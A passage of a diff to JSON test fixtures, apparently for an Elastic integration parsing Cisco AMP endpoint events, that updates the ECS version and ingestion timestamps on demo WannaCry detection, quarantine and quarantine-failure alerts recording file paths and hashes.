Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":3200,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -6570,7 +6570,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -6602,7 +6602,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843736405Z", + "ingested": "2021-09-13T18:07:04.510480074Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":235000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2708,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -6661,7 +6661,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -6691,7 +6691,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843738275Z", + "ingested": "2021-09-13T18:07:04.510481931Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":172000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -6744,7 +6744,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -6764,7 +6764,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843740157Z", + "ingested": "2021-09-13T18:07:04.510483781Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -6815,7 +6815,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -6835,7 +6835,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843765247Z", + "ingested": "2021-09-13T18:07:04.510485650Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -6890,7 +6890,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -6910,7 +6910,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843776640Z", + "ingested": "2021-09-13T18:07:04.510487525Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -6965,7 +6965,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -6985,7 +6985,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843778667Z", + "ingested": "2021-09-13T18:07:04.510489390Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":33000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -7044,7 +7044,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -7076,7 +7076,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843780555Z", + "ingested": "2021-09-13T18:07:04.510491236Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -7133,7 +7133,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -7165,7 +7165,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843782466Z", + "ingested": "2021-09-13T18:07:04.510493135Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -7222,7 +7222,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -7254,7 +7254,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843784355Z", + "ingested": "2021-09-13T18:07:04.510494993Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -7311,7 +7311,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -7343,7 +7343,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843786245Z", + "ingested": "2021-09-13T18:07:04.510496868Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -7400,7 +7400,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -7432,7 +7432,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843788123Z", + "ingested": "2021-09-13T18:07:04.510498746Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":876000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -7489,7 +7489,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -7521,7 +7521,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843790009Z", + "ingested": "2021-09-13T18:07:04.510500626Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":845000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -7578,7 +7578,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -7610,7 +7610,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843791900Z", + "ingested": "2021-09-13T18:07:04.510506069Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":798000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -7667,7 +7667,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -7699,7 +7699,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843793783Z", + "ingested": "2021-09-13T18:07:04.510508336Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":767000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -7756,7 +7756,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -7788,7 +7788,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843795681Z", + "ingested": "2021-09-13T18:07:04.510510239Z", "original": 